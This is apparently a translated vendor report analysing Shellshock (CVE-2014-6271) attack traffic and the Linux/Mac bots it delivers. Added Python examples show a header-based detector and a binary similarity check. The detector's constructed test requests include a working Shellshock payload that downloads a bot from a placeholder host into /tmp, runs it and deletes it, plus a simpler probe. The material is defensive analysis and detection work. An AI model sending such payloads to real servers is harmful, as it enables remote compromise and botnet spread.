Comprehensive Analysis of the Shellshock Vulnerability (CVE-2014-6271): Part Two of the Vulnerability Series
I. Overview of the Shellshock Vulnerability
Our team released the "Comprehensive Analysis of the Shellshock Vulnerability (CVE-2014-6271)" on September 25 and has since updated it several times. During this period, our monitoring, collection and sample-exchange systems observed a large number of attacks exploiting the vulnerability, including scanning and backdoor delivery, and collected several pieces of malicious code related to it.
II. Network Data Packets
Based on the vulnerability's characteristics, we used the "cloud probe" system deployed jointly with colleges and universities to monitor network traffic and captured a number of attack attempts. One attack packet is described below:
From the packet information we can see the following:
The main attack payload is carried in the User-Agent header. The exploitation principle was already analyzed in the "Comprehensive Analysis of the Shellshock Vulnerability (CVE-2014-6271)", so it is not repeated here. The payload downloads the bot file, saves it under the name sh in the /tmp directory, runs it, downloads further malicious code files, and then deletes the file.
The sh file used in the attack and the malicious code files it subsequently downloads target Linux, Unix, Mac OS and similar systems; they are delivered as ELF binaries, Perl scripts and bash scripts.
The vulnerability propagates very effectively through CGI scripts executed by bash: a few scripts suffice, the core being the crafted HTTP header, and to probe a different IP address the attacker only needs to change the address in the Host header.
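The indicators in this section (a bash function definition at the start of an HTTP header value, followed by a download-run-delete chain in /tmp) can be turned into a log-side detection. The following Python example is added here and is not code from the report or from Antiy CERT; the HTTP requests it inspects are constructed samples, and the host names in them are placeholders. It checks every header of a request, not only User-Agent, since a CGI server exports each header to bash as an environment variable, and it distinguishes bare probes from requests that also carry the dropper chain described above.

```python
import re
from typing import Dict, List

# Every Shellshock payload starts with a bash function definition, "() {", placed
# in a value that the CGI server exports to bash as an environment variable.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Indicators of the dropper chain described in the report: fetch a file into /tmp,
# run it, delete it. Two or more of these alongside the marker suggest a dropper.
DROPPER_INDICATORS = {
    "tmp_dir": re.compile(r"/tmp\b"),
    "downloader": re.compile(r"\b(wget|curl|fetch)\b"),
    "cleanup": re.compile(r"\brm\b"),
}


def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request (header section only) into lower-cased header names."""
    lines = raw.replace("\r\n", "\n").split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:          # lines[0] is the request line
        if not line:                # blank line ends the header section
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def analyze_request(raw: str) -> List[Dict[str, str]]:
    """Return one finding per header that carries the Shellshock marker."""
    findings = []
    for name, value in parse_request(raw).items():
        if not SHELLSHOCK_RE.search(value):
            continue
        hits = [label for label, rx in DROPPER_INDICATORS.items() if rx.search(value)]
        findings.append({
            "header": name,
            "stage": "dropper" if len(hits) >= 2 else "probe",
            "indicators": ",".join(hits),
        })
    return findings


# Constructed requests (not captured traffic); example.invalid is a placeholder host.
BENIGN_REQUEST = "\r\n".join([
    "GET /cgi-bin/status.cgi HTTP/1.1",
    "Host: 192.0.2.10",
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "Accept: */*",
    "", "",
])
PROBE_REQUEST = "\r\n".join([
    "GET /cgi-bin/status.cgi HTTP/1.1",
    "Host: 192.0.2.10",
    "Cookie: () { :;}; echo vulnerable",
    "", "",
])
DROPPER_REQUEST = "\r\n".join([
    "GET /cgi-bin/status.cgi HTTP/1.1",
    "Host: 192.0.2.10",
    'User-Agent: () { :;}; /bin/bash -c "cd /tmp; wget -O sh http://example.invalid/bot; chmod +x sh; ./sh; rm -f sh"',
    "", "",
])

if __name__ == "__main__":
    for label, req in [("benign", BENIGN_REQUEST), ("probe", PROBE_REQUEST), ("dropper", DROPPER_REQUEST)]:
        print(label, analyze_request(req))
```

The marker regex tolerates whitespace between the parentheses and the brace, which is what most public IDS signatures for this vulnerability also key on; the indicator counting is only a triage aid, and a hit on the marker alone should already be logged, because in this campaign the Host header is nothing more than the scanned address and carries no signal of its own.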
III. Malicious Code
3.1 Malicious code information
1. Malicious code information:
2. Sample analysis card
3.2 Malicious code process analysis
The CERT "cloud probe" system and the deployed VDS network virus monitoring devices captured a large number of attack packets. Extracting the attack payloads showed that many of them are automated and repeated; the payload in the packet shown in Chapter 2, for example, was delivered many times over, which is how batch attacks are carried out. Below, the attack process of the packet listed in Chapter 2 is used as an example to analyze the attack and how the related samples operate. As Figure 3-1 shows, all four samples are bots; the attacker delivers the same source program compiled for different operating systems and runtime environments in order to infect Linux, Mac and related systems that provide a gcc or Perl environment.
Figure 3-1: Vulnerability and sample workflow
IV. Malicious Code Similarity Analysis
To run on both the 32-bit and the 64-bit version of the operating system, the attacker compiled the same source code several times. To evade detection and removal by anti-virus software, the attacker also applied simple obfuscation. However, no matter how the different versions are compiled or obfuscated, program files built from the same source code retain commonalities, and these commonalities allow us to establish their similarity. As shown in Figure 4-1, the six Shellshock bots seen in two different incidents were found to be consistent.
Figure 4-1: Malicious code similarity analysis
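The report does not describe how the similarity in Figure 4-1 was established. One simple technique that works on binaries compiled from the same source for different architectures is comparing the sets of printable strings the builds share, since string literals survive recompilation and simple packing far better than the code bytes do. The Python example below is an added illustration of this method, not the report's own tooling; the three byte blobs are constructed stand-ins for ELF samples with made-up strings, and the 0.5 threshold is an assumption.

```python
import re
from typing import List, Set

# Printable ASCII runs of at least 4 bytes: the same thing the `strings` tool prints.
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob: bytes) -> Set[bytes]:
    """Return the set of printable strings embedded in a binary blob."""
    return {m.group(0) for m in STRING_RE.finditer(blob)}


def jaccard(a: Set[bytes], b: Set[bytes]) -> float:
    """Jaccard index |A n B| / |A u B|; 1.0 means identical string sets."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def similarity(blob_a: bytes, blob_b: bytes) -> float:
    """String-set similarity between two program files."""
    return jaccard(extract_strings(blob_a), extract_strings(blob_b))


def same_family(blob_a: bytes, blob_b: bytes, threshold: float = 0.5) -> bool:
    """Assumed threshold: builds from one source usually share well over half their strings."""
    return similarity(blob_a, blob_b) >= threshold


def build_sample(strings: List[bytes], build_tag: bytes, filler: bytes) -> bytes:
    """Construct a stand-in for a compiled binary: an ELF-like magic, non-printable
    filler standing for code bytes that differ per build, and NUL-separated strings."""
    body = b"\x00".join(strings + [build_tag])
    return b"\x7fELF" + filler + body + filler


# Constructed strings standing for what a bot's source would embed (not from real samples).
SHARED_STRINGS = [b"connect_to_controller", b"download_payload", b"execute_and_remove",
                  b"/tmp/sh", b"%s:%d"]

# Two "builds" of the same source (different filler and build tag) and one unrelated file.
SAMPLE_X86 = build_sample(SHARED_STRINGS, b"build:x86", b"\x01\x02\x03\x04" * 8)
SAMPLE_X86_64 = build_sample(SHARED_STRINGS, b"build:x86_64", b"\x05\x06\x07\x08" * 16)
UNRELATED = build_sample([b"hello world", b"print_report", b"/var/log/app"], b"build:x86", b"\x01" * 8)

if __name__ == "__main__":
    print("x86 vs x86_64:", round(similarity(SAMPLE_X86, SAMPLE_X86_64), 3))
    print("x86 vs unrelated:", round(similarity(SAMPLE_X86, UNRELATED), 3))
```

On the constructed inputs the two builds share five of seven strings (similarity 5/7) while the unrelated file shares only the build tag (1/9), which is the kind of gap that makes the method useful for clustering; against real samples the string set should be taken after unpacking, since a packer hides the literals the comparison relies on.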
V. Walking out of the Worm Zone (Summary)
In the "Comprehensive Analysis of the Shellshock Vulnerability (CVE-2014-6271)" (the first part of the Shellshock trilogy), we pointed out that the vulnerability "is easy to use for writing self-propagating worms and will also lead to the growth of botnets". Over the past few years, although the number of worms we capture has kept growing, truly influential worms have been rare. Today, however, we see our familiar yet unfamiliar opponent, the worm, return with the help of the Shellshock vulnerability. If the development of technology is a rising spiral that shows "higher-order repetition" at certain points in time, why should the evolution of threats be any different?
Anti-virus workers and anti-virus products have made many attempts to eliminate worms, but the main reason for the decline in worms is the change in the ecosystem. Windows restricted external calls to Outlook, severely curbing the spread of e-mail worms; the introduction of DEP, ASLR, UAC and other mechanisms greatly reduced the spread of scanning overflow worms; and control of AutoPlay reduced the spread of USB flash drive worms. From another perspective, as exploitation becomes more private and targeted, vulnerabilities valuable for writing worms are hidden by attackers and used with caution. At the same time, some botnet controllers gradually switched from worms to other methods such as bundling and fake anti-virus (FakeAV).
Only about half a year after Heartbleed was judged the most serious vulnerability in three years, the Shellshock vulnerability was suddenly exposed, and within a few days CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187 and CVE-2014-6277 followed. The disclosure of a severe vulnerability often has a demonstration and comparison effect, which is the reason for this "coming together" that we can think of for now. Every earthquake has its chain of aftershocks, and after them come the days of the crows.
At the same time, looking at Linux/Mac OS from the perspective of a security team more familiar with Windows undoubtedly raises many questions. Recompilation brings many variants, the large number of versions brings fragmentation, and both bring great uncertainty to patching. Built-in compilers and rich scripting are both a stage for programmers and soil for attackers. In Windows attacks we often see BAT and VBS scripts, but they usually play supporting roles rather than being the functional body of the malicious code; unless the goal is source code contamination, it is rare for an attacker to drop a piece of C++ source code or a project into a scenario where it can be compiled. The gcc source code and the Perl script in this report have an entirely different value, and this pattern is no stranger either in the past or in the future. The method not only fits the characteristics of the scenario but is also a lightweight form of anti-virus evasion. In the future, Linux/Mac OS will be an important battlefield for attack and defense; although the packers and obfuscation tools of its malicious code are still simple and naive compared with the large number of underground and commercial packers on Windows, everything has already begun.
I would like to dedicate our work to our family, our comrades-in-arms, and our motherland.
Appendix: References
[1] CERT laboratory: Comprehensive Analysis of the Shellshock Vulnerability (CVE-2014-6271)
http://www.antiy.com/response/CVE-2014-6271.html
[2] Knownsec: ShellShock emergency summary
http://blog.knownsec.com/2014/09/shellshock_response_profile/
[3] Knownsec: Bash 3.0-4.3 command execution vulnerability analysis
http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-analysis/
[4] First Shellshock botnet attacks Akamai, US DoD networks
http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx
[5] Linux ELF bash 0day (shellshock): The fun has only just begun...
http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html
[6] CERT laboratory: "Step out of worms and Trojans", part two of the AVER introspection trilogy
http://www.antiy.com/presentation/Methodology_AVER_Introspection_Trilogy_II.htm